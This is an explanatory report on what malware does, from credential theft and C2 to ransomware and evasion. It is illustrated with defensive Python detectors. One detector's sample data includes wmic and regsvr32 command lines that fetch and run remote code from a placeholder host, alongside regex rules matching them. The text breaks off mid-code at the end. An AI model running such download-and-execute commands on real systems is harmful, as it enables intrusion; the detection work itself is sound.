What Can Malware Do

Malware, short for malicious software, is one of the most significant threats to modern computing environments, capable of an extraordinarily diverse range of harmful activity against individual users and organizations alike. What contemporary malware can accomplish extends far beyond the file deletion and system slowdowns of earlier decades: it now includes large-scale data theft, complete system takeover, financial extortion, unauthorized consumption of computing resources, and damage to critical infrastructure. Understanding this full spectrum of capability is essential for building effective defenses, because threat actors continuously evolve their tools and techniques to exploit new vulnerabilities and circumvent security controls. This report examines the damaging actions malware can perform, the mechanisms through which it achieves them, and the consequences for individuals and organizations. Drawing on documented cases, it shows that modern malware serves as a tool for financial gain, espionage, sabotage, and the disruption of critical services across virtually every sector.

Data Exfiltration and Credential Theft: The Foundation of Malware Damage

Data exfiltration is one of the most common and damaging objectives of malware, and threat actors use a wide variety of techniques to pull sensitive information off compromised systems. Once a system is infected, attackers can steal whatever it holds or can reach: email, passwords and other login credentials, intellectual property, and financial records. The resulting monetary and reputational damage can be substantial, because stolen data is reused for identity theft, financial fraud and competitive espionage, or sold on dark-web marketplaces to other criminals. Exfiltration tooling has also become more selective, with malware built to identify and extract the most valuable information on a host rather than copying everything indiscriminately.

Credential theft is a particularly critical capability, because stolen credentials give attackers access that looks legitimate to the systems and services they log into. Keyloggers, a form of spyware that monitors user activity, are among the most effective ways of capturing authentication data: they silently record every keystroke, including passwords, financial details and private messages. Some keyloggers are installed for legitimate purposes such as employee or parental monitoring; installed maliciously, the same software harvests passwords, banking details and other sensitive data. The Olympic Vision keylogger is a case in point. It was used against business people in the US, the Middle East and Asia in business email compromise campaigns, delivered through spear-phishing and social engineering, to steal data and spy on business transactions. Despite its simplicity compared with more advanced malware, Olympic Vision sold on the black market for about $25, putting it within reach of attackers with little money or technical skill.

Information stealers are a more capable category of credential-stealing malware, and recent examples show how thoroughly they can harvest authentication data across platforms. In a 2025 incident, researchers found a set of malicious npm packages that delivered an information stealer for Windows, Linux and macOS. The packages were wrapped in four layers of obfuscation, displayed a fake CAPTCHA to look legitimate, fingerprinted victims by IP address, and then downloaded a large PyInstaller-packaged stealer that harvested credentials from system keyrings, browsers and authentication services. Targeting the keyring directly bypasses application-level protections and yields stored secrets in decrypted form, giving immediate access to corporate email, file storage, internal networks and production databases. This is a dangerous design from the defender's point of view, because system keyrings hold credentials for email clients, cloud storage sync tools, VPN connections, password managers, SSH passphrases and database connection strings, which together give an attacker broad access to the victim organization.

The consequences of credential theft go well beyond immediate financial loss, because compromised credentials serve as the entry point for further attacks and lateral movement across a network. In one documented case, the threat actor tracked as COSMIC WOLF compromised a large cloud service provider environment using a single stolen credential. That credential let the operator drive the cloud service from its command-line interface, and they used it to alter security group settings so that their own infrastructure could SSH directly into the environment. The progression from one stolen credential to infrastructure-level control shows how credential-stealing malware acts as the first step in an attack chain that can end in complete organizational compromise, with each successful lateral move extending the attacker's reach to additional systems and data.
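The security-group change in the COSMIC WOLF case is exactly the kind of event a cloud audit log records, and it is cheap to alert on. The following is an added example, not code from the original article or from any vendor: it scans constructed CloudTrail-style events for AuthorizeSecurityGroupIngress calls that expose SSH to addresses outside an assumed allow-list, and separately flags calls that were themselves made from outside it. The event shape, the access key, and the TRUSTED_SOURCES range are all assumptions for the demo.

```python
"""Flag security-group changes that open SSH to untrusted sources.

Added example, not code from the original article or from any vendor:
the events below are constructed to resemble AWS CloudTrail records, and
TRUSTED_SOURCES is a hypothetical allow-list of corporate egress ranges.
"""
import ipaddress
import json

# Assumption for the demo: the only networks that should ever reach SSH.
TRUSTED_SOURCES = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed sample events in CloudTrail-like shape (not real log data).
SAMPLE_EVENTS = [
    json.dumps({
        "eventTime": "2025-06-01T09:12:44Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "AuthorizeSecurityGroupIngress",
        "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
        "requestParameters": {
            "groupId": "sg-0a1b2c3d4e5f67890",
            "ipPermissions": {"items": [{
                "ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
                "ipRanges": {"items": [{"cidrIp": "203.0.113.0/24"}]}}]},
        },
    }),
    json.dumps({  # the COSMIC WOLF-style change: SSH opened to attacker infra
        "eventTime": "2025-06-01T23:41:03Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "AuthorizeSecurityGroupIngress",
        "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
        "requestParameters": {
            "groupId": "sg-0a1b2c3d4e5f67890",
            "ipPermissions": {"items": [{
                "ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
                "ipRanges": {"items": [{"cidrIp": "198.51.100.7/32"}]}}]},
        },
    }),
    json.dumps({
        "eventTime": "2025-06-01T23:42:10Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeInstances",
        "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE"},
        "requestParameters": {},
    }),
]


def is_trusted(addr: str, trusted=TRUSTED_SOURCES) -> bool:
    """True if an IP or CIDR lies entirely within a trusted range."""
    try:
        net = ipaddress.ip_network(addr, strict=False)
    except ValueError:  # e.g. "ec2.amazonaws.com" for service-initiated calls
        return False
    return any(net.version == t.version and net.subnet_of(t) for t in trusted)


def covers_port(perm: dict, port: int) -> bool:
    """Does one ipPermissions entry allow TCP traffic to `port`?"""
    proto = str(perm.get("ipProtocol", ""))
    if proto == "-1":            # all protocols / all ports
        return True
    if proto not in ("tcp", "6"):
        return False
    return perm.get("fromPort", 0) <= port <= perm.get("toPort", 65535)


def find_suspicious_ingress(raw_events, trusted=TRUSTED_SOURCES, port=22):
    """Return findings for ingress rules exposing `port` beyond the allow-list.

    Two independent signals are recorded: the CIDR being authorised is not
    trusted, and/or the API call itself came from an untrusted address.
    """
    findings = []
    for raw in raw_events:
        ev = json.loads(raw)
        if ev.get("eventName") != "AuthorizeSecurityGroupIngress":
            continue
        caller = ev.get("sourceIPAddress", "")
        params = ev.get("requestParameters") or {}
        for perm in params.get("ipPermissions", {}).get("items", []):
            if not covers_port(perm, port):
                continue
            for rng in perm.get("ipRanges", {}).get("items", []):
                cidr = rng.get("cidrIp", "")
                reasons = []
                if not is_trusted(cidr, trusted):
                    reasons.append(f"port {port} opened to untrusted {cidr}")
                if not is_trusted(caller, trusted):
                    reasons.append(f"API call made from untrusted {caller}")
                if reasons:
                    findings.append({
                        "time": ev.get("eventTime"),
                        "group_id": params.get("groupId"),
                        "cidr": cidr,
                        "caller": caller,
                        "access_key": ev.get("userIdentity", {}).get("accessKeyId"),
                        "reasons": reasons,
                    })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_ingress(SAMPLE_EVENTS):
        print(f["time"], f["group_id"], "; ".join(f["reasons"]))
```

The two signals are deliberately kept separate: a rule opened to an unknown CIDR by an operator sitting on the corporate network is a policy question, while a rule opened from an unknown caller address with a long-lived access key is the stolen-credential pattern described above and deserves an immediate key rotation.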

System Control and Remote Manipulation: Command and Control Infrastructure

Among the most significant capabilities of modern malware is the establishment of remote command and control (C2, or C&C) infrastructure, which lets attackers keep persistent control over compromised systems and run arbitrary commands at will. C2 is the method by which cybercriminals communicate with compromised devices inside a target network: malware on the victim receives commands from, and returns data to, a C2 server under the attacker's control. This bidirectional channel is what turns individual infected machines into nodes of a larger attack infrastructure able to coordinate complex, multi-stage operations across many victims. From the server, the attacker can direct data discovery, spread additional malware, or launch denial of service attacks; the same server typically serves as the headquarters of a botnet, a network of infected devices.

C2 infrastructure has grown considerably more sophisticated as defenders have improved at spotting it. Some attackers hide C2 servers behind existing cloud-based services, maintaining one or more channels between the victim's machine or organization and a platform the attacker controls. A notable recent example is SesameOp, a backdoor discovered in 2025 that uses the OpenAI Assistants API as its command-and-control channel, abusing the service as a place to stealthily exchange messages and orchestrate activity inside the compromised environment. Rather than relying on a conventional C2 server, the backdoor contains a component that treats the Assistants API as a storage or relay mechanism from which it fetches commands, which the malware then runs. Attackers, in other words, continually adapt to whatever new services are available.

How malware reaches its C2 infrastructure varies with the sophistication and resources of the threat actor. Centralized models work much like a traditional client-server relationship: malware clients "phone home" to a C2 server and check for instructions. In practice the attacker's server-side setup is often far more than a single server, with redirectors, load balancers and defensive measures intended to detect security researchers and law enforcement. Public cloud services and content delivery networks are frequently used to host or mask C2 traffic, and attackers commonly compromise legitimate websites and host C2 servers on them without the owner's knowledge. As defenders have become better at detecting and blocking known C2 domains and servers, malware is often built with a list of many fallback C2 endpoints to try, and the most sophisticated operations add further layers of obfuscation so the implant keeps working even as individual endpoints are taken down.
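The "phone home" behaviour described above has a detectable side effect: an implant polling on a timer produces connections at suspiciously regular intervals, whereas a person browsing does not. The following added example, not code from the original article, applies that idea to a constructed egress log (timestamp, source, destination, port, bytes). It groups connections per source/destination pair and reports pairs whose inter-connection gaps and payload sizes vary very little; the thresholds are assumptions to be tuned against real traffic.

```python
"""Spot beacon-like connection cadence in egress logs.

Added example, not from the original article: SAMPLE_LOG is a constructed
egress log (timestamp, src, dst, dst_port, bytes). The method is the classic
one of looking for low variance in inter-connection intervals per src/dst pair.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Constructed log lines. 10.0.0.5 phones home every ~5 minutes with tiny
# jitter; 10.0.0.7 is a person browsing at irregular times.
SAMPLE_LOG = """\
2025-06-01T10:00:00Z 10.0.0.5 198.51.100.20 443 512
2025-06-01T10:00:00Z 10.0.0.7 203.0.113.50 443 40210
2025-06-01T10:00:07Z 10.0.0.7 203.0.113.50 443 1833
2025-06-01T10:03:45Z 10.0.0.7 203.0.113.50 443 9920
2025-06-01T10:05:01Z 10.0.0.5 198.51.100.20 443 508
2025-06-01T10:09:59Z 10.0.0.5 198.51.100.20 443 515
2025-06-01T10:15:00Z 10.0.0.5 198.51.100.20 443 511
2025-06-01T10:20:02Z 10.0.0.5 198.51.100.20 443 509
2025-06-01T10:21:12Z 10.0.0.7 203.0.113.50 443 77012
2025-06-01T10:22:00Z 10.0.0.7 203.0.113.50 443 3051
2025-06-01T10:24:58Z 10.0.0.5 198.51.100.20 443 514
2025-06-01T10:30:00Z 10.0.0.5 198.51.100.20 443 510
2025-06-01T10:35:01Z 10.0.0.5 198.51.100.20 443 512
2025-06-01T10:48:30Z 10.0.0.7 203.0.113.50 443 12880
2025-06-01T10:49:10Z 10.0.0.7 203.0.113.50 443 640
"""


def parse_log(text):
    """Yield (epoch_seconds, src, dst, dport, nbytes) per non-empty line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, nbytes = line.split()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        yield when.timestamp(), src, dst, int(dport), int(nbytes)


def beacon_candidates(text, min_events=6, max_cv=0.15, max_size_cv=0.25):
    """Return src/dst/port triples whose timing and payload size are suspiciously regular.

    cv = stdev / mean of the inter-connection intervals; near zero means a timer.
    Size regularity is a second, weaker signal (a heartbeat carries little data).
    """
    by_pair = defaultdict(list)
    for when, src, dst, dport, nbytes in parse_log(text):
        by_pair[(src, dst, dport)].append((when, nbytes))

    out = []
    for (src, dst, dport), events in by_pair.items():
        if len(events) < min_events:
            continue
        events.sort()
        gaps = [b[0] - a[0] for a, b in zip(events, events[1:])]
        sizes = [n for _, n in events]
        gap_cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        size_cv = statistics.pstdev(sizes) / statistics.mean(sizes)
        if gap_cv <= max_cv and size_cv <= max_size_cv:
            out.append({
                "src": src, "dst": dst, "dport": dport,
                "events": len(events),
                "median_gap_s": statistics.median(gaps),
                "gap_cv": round(gap_cv, 3),
                "size_cv": round(size_cv, 3),
            })
    return sorted(out, key=lambda r: r["gap_cv"])


if __name__ == "__main__":
    for c in beacon_candidates(SAMPLE_LOG):
        print(c)
```

Two caveats a practitioner should keep in mind: many C2 frameworks add configurable jitter to the sleep interval, which raises the coefficient of variation and calls for a looser `max_cv` combined with other signals (destination rarity, TLS fingerprint, newly registered domain); and legitimate software updaters and telemetry agents also beacon on timers, so this is a triage signal, not a verdict. Because the text notes that implants carry a list of fallback endpoints, it is also worth aggregating by source host rather than only by destination when the chosen C2 server changes mid-campaign.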

Lateral movement within a compromised network is a key capability enabled by C2 infrastructure, letting an attacker expand from an initial foothold to high-value targets across the organization. Once an attacker controls a device inside the network, they perform reconnaissance to learn as much as possible about it: what the compromised device can reach and, if they hold a user's account, what privileges that user has. Through the C2 channel they then orchestrate privilege escalation, moving from a limited user account to administrator or system-level access. The process is repeated until the attacker reaches targets such as file servers or domain controllers that hold the most sensitive data. The BRICKSTORM backdoor, attributed by the investigators who documented it to a China-nexus espionage actor, illustrates this well: it is built to maintain persistence and minimize what traditional security tools can see, and investigations found that its operators first deployed BRICKSTORM to network appliances and then moved laterally to vCenter servers and ESXi hosts using valid credentials the malware had captured.

Ransomware, Extortion, and Multi-Layered Financial Attacks

Ransomware is one of the most destructive categories of malware. It encrypts a target's data to deny access until a ransom is paid; in the meantime the victim organization is partly or wholly unable to operate, and there is no guarantee that paying will produce a decryption key, or that the key will work. The evolution from simple file encryption to multi-extortion schemes shows how steadily the threat to organizational operations and finances has escalated. In 2019 the city of Baltimore was hit by ransomware named RobbinHood, which halted city activities including tax collection, property transfers and government email for weeks; the attack cost the city more than $18 million, with costs still accruing. A ransomware attack on the city of Atlanta in 2018 (in that case the SamSam family) cost an estimated $17 million, showing how such attacks devastate municipal operations and drain public funds that would otherwise support essential services.

The mechanics of ransomware have evolved from straightforward encryption into multi-extortion operations that stack several threats to maximize pressure to pay. Multi-extortion (or multifaceted extortion) ransomware adds attack methods beyond file encryption, such as data exfiltration, distributed denial of service attacks, or ransom demands extended to the victim's third-party associates. Single extortion, the first phase of such an attack, is the encryption itself: attackers encrypt whole systems or selected files judged most important. Many organizations have blunted this threat with up-to-date backups, so operators added a second phase based on data exfiltration, a tactic popularized by Maze and DoppelPaymer, in which attackers steal sensitive data and threaten to publish it on dark-web leak sites or sell it on the black market.

Escalating from double to triple extortion adds yet another layer of threat on top of file encryption and data theft, and the form it takes depends on the group. One popular layer is service disruption, typically a distributed denial of service attack, so that on top of losing and leaking data the victim's critical operations are also threatened. Another layer growing in popularity is the third-party associate attack, in which the attacker extends threats and ransom demands to the original victim's clients, suppliers or other partners, multiplying the pressure points. Some analysts count this as a fourth layer and call the result quadruple extortion; whatever the label, the tactic was on display when hardware supplier Quanta refused to pay the REvil ransomware group in 2021 and the attackers turned to Apple, one of Quanta's clients, with their demands.

Banking malware is a specialized, financially motivated category that targets the financial services sector and individuals' banking credentials. Zeus, a banking trojan first seen in 2007, was designed to steal financial data and banking credentials; after its source code leaked it spawned a long line of variants with new delivery mechanisms, command and control techniques and anti-analysis features, demonstrating how banking trojans keep adapting to evade detection while retaining their core theft capability. TrickBot, first identified in 2016 and developed and operated by sophisticated cybercrime actors, began as a banking trojan but grew into modular, multi-stage malware that gave its operators a full suite of tools for a wide range of illegal cyber activity. Banking trojans are commonly distributed through drive-by downloads from compromised websites, through malvertising (malicious code inserted into adverts placed on legitimate websites), and through malicious JavaScript injected into web pages that produces pop-ups pushing users to download fake plugins.

Resource Exploitation and Unauthorized Computing Power Theft

Malware increasingly targets the computing resources of the systems it infects, using stolen processing power for unauthorized cryptocurrency mining, botnet participation and spam distribution, all of which profit the attacker while degrading performance for the legitimate user. Cryptojacking, the covert use of other people's devices, without their consent or knowledge, to mine cryptocurrency at the victim's expense, is a growing threat across desktop, mobile and enterprise environments. Instead of building dedicated mining rigs with their large capital and power costs, attackers steal the resources of thousands of victim devices; aggregated, those stolen cycles let them compete with professional mining operations without the overhead. The motivation is simply money: mining can be lucrative, but turning a profit honestly now requires covering large costs, so cryptojacking is an effective, cheap way for resource-limited actors to mine valuable coins.

Cryptojackers hijack victim computing resources in several ways, each with its own detection and removal challenges. One method works like classic malware: the user clicks a malicious link in an email that loads mining code onto the computer, and from then on the cryptojacker mines around the clock while staying hidden in the background, a persistent infection of the host itself. The alternative, sometimes called drive-by cryptomining, embeds JavaScript mining code in a web page so that every visitor's machine mines for as long as the page is open. Early instances involved web publishers caught up in the cryptocurrency boom who openly asked visitors' permission to mine while on the site as a way of supplementing advertising revenue. Some of those early schemes posed as a fair exchange between publisher and visitor, but the more recent incarnation typically runs without the user's knowledge or consent, silently consuming computational resources for someone else's gain.

The consequences of cryptojacking go beyond an individual's frustration with a slow computer and become substantial costs for larger organizations with many affected systems. Unlike most other malware, cryptojacking scripts may not damage the computer or the victim's data, but stealing CPU resources has real consequences: slower performance is far more than an annoyance across a fleet of compromised machines. Electricity costs, IT labor and missed opportunities are only some of the costs of a widespread drive-by cryptojacking infestation. In one documented incident, criminals cryptojacked the operational technology network of a European water utility's control system, degrading the operators' ability to manage the plant. In another, a group of Russian scientists allegedly used the supercomputer at their nuclear warhead research facility to mine Bitcoin, showing that even high-value, supposedly isolated systems are targets.

Botnets are another mechanism by which malware harnesses victim computing resources for the attacker's benefit at the expense of legitimate performance. A bot is a software application that performs automated tasks on command; bots have legitimate uses such as search engine indexing, but in malicious form they are self-propagating malware that connects back to a central server. Bots are usually deployed in large numbers to form a botnet, a network of infected machines used to launch broad, remotely controlled floods of attacks such as DDoS. Botnets can be enormous: estimates of the Mirai IoT botnet's size ranged from roughly 800,000 to 2.5 million devices. Echobot, a Mirai variant, attacks a wide range of IoT devices by exploiting more than 50 different vulnerabilities, and it also carries exploits for Oracle WebLogic Server and VMware's SD-WAN networking software, enabling its operators to launch DDoS attacks, interrupt supply chains, steal supply chain information and conduct corporate sabotage.

Spam propagation through compromised systems is yet another way malware exploits victim resources for financial gain. It consists of infected systems sending unsolicited commercial or bulk email, with spambots using those machines to distribute enormous volumes of messages to unwilling recipients. Beyond the direct computational cost, the victim's system becomes associated with spam, which can damage the victim's reputation and get their IP address or email domain blacklisted by anti-spam systems. Many organizations, particularly operators of physical infrastructure, face competing priorities such as facilities operation and maintenance that constrain the time and resources available for cybersecurity, creating conditions in which a botnet can operate undetected for long periods while generating substantial revenue for the attacker.

Surveillance, Privacy Violation, and Personal Data Harvesting

Malware enables surveillance and privacy violation on an unprecedented scale, with spyware able to turn a victim's device into a comprehensive surveillance instrument that captures nearly every aspect of their activity. Spyware operates clandestinely, gathering data without the user's approval, and frequently leads to privacy violations and identity theft; it tracks and records personal and sensitive information, from browsing habits to login credentials, without the user's knowledge or consent. Its surreptitious nature makes it especially insidious, since the victim may be unaware of the breach for a long time while the collected data is exploited for fraud and targeted phishing, which underlines the importance of securing personal information and using anti-spyware tools. In this form of data espionage, attackers typically use keyloggers to record keystrokes, access web cameras and microphones, and capture screenshots.

Modern surveillance malware goes well beyond keystroke logging and screenshots, with techniques for accessing webcams, microphones and other system resources that allow comprehensive monitoring. Tools such as the Pegasus spyware can turn most smartphones into "24-hour surveillance devices", giving the intruder access not only to everything on the device but also the ability to weaponize it to spy on the victim's life. Although purportedly deployed to combat terrorism and crime, such tools have frequently been used for illegitimate ends, including suppressing critical or dissenting views and targeting the journalists, opposition politicians and human rights defenders who express them. On a computer, spyware can record almost everything the user does: every keystroke, website visited, chat or instant message sent or received, and document opened. Some spyware also lets whoever installed it switch on the webcam or microphone, take screenshots, make the computer talk or emit other noises, or shut down or restart the machine.

Adware is a category of malware that generates revenue through advertising while degrading the user experience and system security. It inundates users with unsolicited advertisements, impairs performance, and can serve as a conduit for further infections: besides displaying persistent ads and slowing the system, adware can exploit vulnerabilities to install additional malicious programs, which is why it is a genuine risk rather than a mere nuisance and why effective ad-blocking and anti-malware tooling matters. Advertising click fraud gives the operator a cut of the commission earned by fraudulent clicks on advertisements. The Zacinlo rootkit is an example: it opens invisible browser windows and interacts with content the way a person would, scrolling, highlighting and clicking, to fool behavioral analysis, and its payoff comes when it clicks on ads inside those hidden browsers.

Identity theft is a critical consequence of malware-enabled data harvesting, with attackers using stolen personal information to commit fraud or gain access to further resources. The IBM X-Force Threat Intelligence Index 2024 reported a 71% year-over-year rise in attacks that used valid, stolen credentials in 2023. The consequences extend well beyond immediate financial loss and can include damaged credit ratings, compromised medical records, false criminal accusations, and years of effort to restore the victim's reputation and finances. Identity theft occurs when someone uses personal or financial information without permission, including names and addresses, credit card or Social Security numbers, bank account numbers, and medical insurance account numbers; victims often remain unaware until substantial damage has already been done to their assets, credit and reputation.

System Damage and Operational Disruption: Making Systems Unusable

Malware can damage systems through mechanisms that corrupt files, crash systems, render devices unusable, or block access to functionality needed for normal operation. Some malware, computer worms among them, damages devices by corrupting system files, deleting data or changing system settings, leaving the system unstable or unusable. System corruption is one of the most direct forms of damage. Malware targets Windows system files in several ways: deleting them outright and causing instability; hijacking core DLL files to help propagate the infection, which leaves those files unusable; corrupting the files in place; and corrupting Windows Registry entries so that Windows can no longer locate the system files it needs.

A logic bomb is malicious code planted in a system ahead of time that stays dormant until a specific condition is met, such as a user taking a particular action or the arrival of a certain date or time, and then executes its payload. The damage ranges from altering a few bytes of data to making hard drives unreadable. Some reports describe logic bombs that target hardware, driving cooling fans, hard drives and power supplies in a workstation or server until they overheat or fail, though such claims should be treated with caution. The best-documented case of malware causing physical damage is Stuxnet, a worm whose payload executed only when it found a specific Siemens PLC and drive configuration and then manipulated Iran's uranium-enrichment centrifuges until they were damaged, demonstrating that malware can go beyond digital consequences to physically destroy critical equipment.

Service disruption through malware-enabled denial of service is another category of system damage, in which attackers make services unavailable to legitimate users. Malware can disrupt services in several ways: by locking up computers and making them unusable, by holding them hostage in a ransomware attack, or by targeting critical infrastructure such as power grids, healthcare facilities or transportation systems. The consequences of attacks on critical infrastructure reach beyond the affected organization to public safety and the essential services modern society depends on. Botnet-driven DDoS attacks are the primary mechanism: the threat actor seeks to make websites, web applications, networks and infrastructure unavailable by saturating them with traffic until they slow to a crawl or crash.

Evasion, Anti-Forensics, and Persistence Mechanisms: Avoiding Detection and Removal

Modern malware uses increasingly sophisticated techniques to evade security tools, to persist across reboots and configuration changes, and to erase forensic evidence of compromise. Fileless malware is a particularly challenging category because it installs nothing on disk at first; instead it abuses tools that are native to the operating system, such as PowerShell and WMI, whose activity the operating system and antivirus treat as legitimate, so the attack is often not caught by file-based antivirus scanning. One widely cited industry estimate puts fileless attacks at up to ten times more likely to succeed than traditional file-based ones. Astaroth is a representative fileless campaign: it spams users with links to .LNK shortcut files which, when opened, launch the WMIC tool along with several other legitimate Windows utilities to download additional code that executes only in memory, leaving nothing on disk for signature scanners to find, before finally fetching and running a trojan that steals credentials and uploads them to a remote server.
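Because fileless campaigns such as Astaroth leave nothing for a file scanner, the practical detection surface is process telemetry: which legitimate binary was launched, with what command line, and by whom. The following is an added example, not code from the original article or from Microsoft's analysis of Astaroth. It applies three command-line rules to a constructed, Sysmon-like process-creation list (the PIDs, paths and `example.invalid` URLs are placeholders) and reports each hit together with its parent chain, which is what lets an analyst tell an administrator's `wmic` query from one spawned by a shortcut file.

```python
"""Flag living-off-the-land process chains of the Astaroth kind.

Added example, not from the original article or from Microsoft's analysis:
EVENTS is a constructed, Sysmon-like process-creation list, and the URLs in
it are placeholders. The rules encode the behaviours the text describes:
wmic.exe fetching a remote XSL, regsvr32.exe loading a remote scriptlet, and
mshta.exe running remote content, each reported with its parent chain.
"""
import re

# Constructed events: (pid, ppid, image, command_line). Not real telemetry.
EVENTS = [
    (100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # admin doing normal inventory work: should NOT be flagged
    (150, 100, "cmd.exe", "cmd.exe"),
    (151, 150, "wmic.exe", "wmic os get caption,version"),
    # user double-clicked a .LNK: cmd -> wmic with a remote stylesheet
    (200, 100, "cmd.exe", 'cmd.exe /c "wmic process get /format:\\"http://example.invalid/s.xsl\\""'),
    (201, 200, "wmic.exe", 'wmic process get /format:"http://example.invalid/s.xsl"'),
    # follow-on stage: regsvr32 fetching a scriptlet
    (202, 201, "regsvr32.exe", "regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll"),
    (300, 100, "msedge.exe", "msedge.exe --profile-directory=Default"),
]

# (rule name, target image, pattern that must appear in the command line)
RULES = [
    ("wmic_remote_xsl", "wmic.exe",
     re.compile(r"/format\s*:\s*\"?\s*https?://", re.I)),
    ("regsvr32_remote_scriptlet", "regsvr32.exe",
     re.compile(r"(/i\s*:\s*https?://|scrobj\.dll)", re.I)),
    ("mshta_remote_content", "mshta.exe",
     re.compile(r"(https?://|javascript:|vbscript:)", re.I)),
]


def ancestry(pid, by_pid, max_depth=16):
    """Return image names from the root ancestor down to `pid`."""
    chain = []
    seen = set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        _, ppid, image, _ = by_pid[pid]
        chain.append(image.lower())
        pid = ppid
    return list(reversed(chain))


def detect_lolbin_abuse(events):
    """Apply RULES to each event; return findings with the full parent chain."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, _, image, cmdline in events:
        for rule, target, pattern in RULES:
            if image.lower() == target and pattern.search(cmdline):
                findings.append({
                    "rule": rule,
                    "pid": pid,
                    "chain": " > ".join(ancestry(pid, by_pid)),
                    "cmdline": cmdline,
                })
    return findings


if __name__ == "__main__":
    for f in detect_lolbin_abuse(EVENTS):
        print(f"{f['rule']:28} {f['chain']}")
```

The benign `wmic os get caption,version` is not flagged because the rule keys on the remote `/format:` stylesheet, not on `wmic.exe` itself; in a real deployment the parent chain is the next filter (a chain rooted in an Office application, a browser or a shortcut launched from `explorer.exe` is far more suspicious than one rooted in an administrator's console session). PID reuse over a long log window means a production version should key on process GUIDs rather than raw PIDs.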

Polymorphic and metamorphic malware change their appearance while keeping their core functionality, defeating detection that depends on fixed patterns. Polymorphic malware changes its code or appearance on each new infection, typically by re-encrypting its body with a fresh key and varying the decryption stub, so that traditional signature-based antivirus has no stable byte pattern to match. Metamorphic malware goes a step further: rather than just re-encrypting, it rewrites its own instructions while preserving behavior, so there is no fixed signature at all and security products must fall back on behavioral analysis and heuristics to identify it.
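The reason static signatures fail against polymorphic samples, and the reason scanning after unpacking (in a sandbox or in memory) still works, is easiest to see with a toy. The following added example, not code from the original article or from any real malware family, wraps a harmless placeholder payload in a fresh random XOR key and random-length padding on every build. Every variant has different bytes and a different hash, a substring signature over the file never matches, yet a signature applied after emulating the stub matches every time. The packer format, the PAYLOAD string and the SIGNATURE are all invented for the demonstration.

```python
"""Why byte signatures miss polymorphic samples, and what still catches them.

Added example, not from the original article: a toy "packer" that wraps a
fixed payload in a fresh random XOR key and random-length padding on every
build, so each variant has different bytes and a different hash while the
decrypted payload is identical. PAYLOAD is a harmless placeholder string.
"""
import hashlib
import random

# Constructed stand-in for a malicious body; the signature is a substring of it.
PAYLOAD = b"[[toy-payload: write credentials to C2 endpoint]]"
SIGNATURE = b"toy-payload"

MAGIC = b"PK0"  # 3-byte header the toy stub "knows" how to unpack


def pack(payload: bytes, rng: random.Random) -> bytes:
    """Produce one variant: MAGIC | key_len | key | pad_len | pad | xor(payload, key)."""
    key = bytes(rng.randrange(1, 256) for _ in range(rng.randrange(4, 17)))
    pad = bytes(rng.randrange(256) for _ in range(rng.randrange(0, 64)))
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return MAGIC + bytes([len(key)]) + key + bytes([len(pad)]) + pad + body


def unpack(blob: bytes) -> bytes:
    """Emulate the stub: read key and padding lengths, strip them, XOR back."""
    if not blob.startswith(MAGIC):
        raise ValueError("not a toy-packed blob")
    pos = len(MAGIC)
    key_len, pos = blob[pos], pos + 1
    key, pos = blob[pos:pos + key_len], pos + key_len
    pad_len, pos = blob[pos], pos + 1
    body = blob[pos + pad_len:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))


def static_match(blob: bytes, sig: bytes = SIGNATURE) -> bool:
    """Plain substring signature over the bytes as they sit on disk."""
    return sig in blob


def unpacked_match(blob: bytes, sig: bytes = SIGNATURE) -> bool:
    """Same signature applied after emulating the unpacking, i.e. what a
    sandbox or memory scanner sees once the stub has run."""
    try:
        return sig in unpack(blob)
    except ValueError:
        return False


def build_variants(n: int, seed: int = 1) -> list:
    """Build n variants of the same payload from a seeded RNG."""
    rng = random.Random(seed)
    return [pack(PAYLOAD, rng) for _ in range(n)]


def compare(variants) -> dict:
    """Summarise how each detection approach fares across the variants."""
    return {
        "variants": len(variants),
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "static_hits": sum(static_match(v) for v in variants),
        "unpacked_hits": sum(unpacked_match(v) for v in variants),
    }


if __name__ == "__main__":
    print(compare(build_variants(20)))
```

Real polymorphic engines vary the decryption stub as well as the key, so a signature on the stub (the one constant here is `MAGIC`) is the next thing to go; that is why the text says metamorphic code pushes defenders all the way to behavioral detection. The unpack-then-scan approach in `unpacked_match` is the same idea that antivirus emulators, sandbox detonation and memory scanning rely on.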

Obfuscation and anti-analysis techniques are fundamental evasion mechanisms used by sophisticated malware to resist both automated and manual analysis. Code obfuscation is the deliberate manipulation of a program's structure, logic, and presentation to make it convoluted; it aims to defeat signature-based detection by transforming the code into a non-standard form that obscures recognizable patterns, and it raises the cost of manual reverse engineering. Sandbox detection is a behaviour-based evasion technique by which malware checks whether it is running inside a controlled environment, such as a virtual machine or analysis sandbox, by looking for artefacts associated with such environments: specific file paths, drivers, registry entries, process names, hardware profiles, or network configurations. When it detects an analysis environment, the malware may alter its behaviour, delay its malicious actions, or stay dormant, so that analysts and automated systems see nothing of interest and its true intent is revealed only on a real user's machine.
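The sandbox checks described above can be turned around and used by the people running the sandbox. The following added example (not code from the original article; the indicator lists, the thresholds, and both host descriptions are constructed assumptions for illustration) evaluates the common checks against a description of a host, so an analyst can see which artefacts a default analysis VM leaks and confirm that a hardened one passes.

```python
# OUI (first three MAC octets) ranges assigned to common hypervisors.
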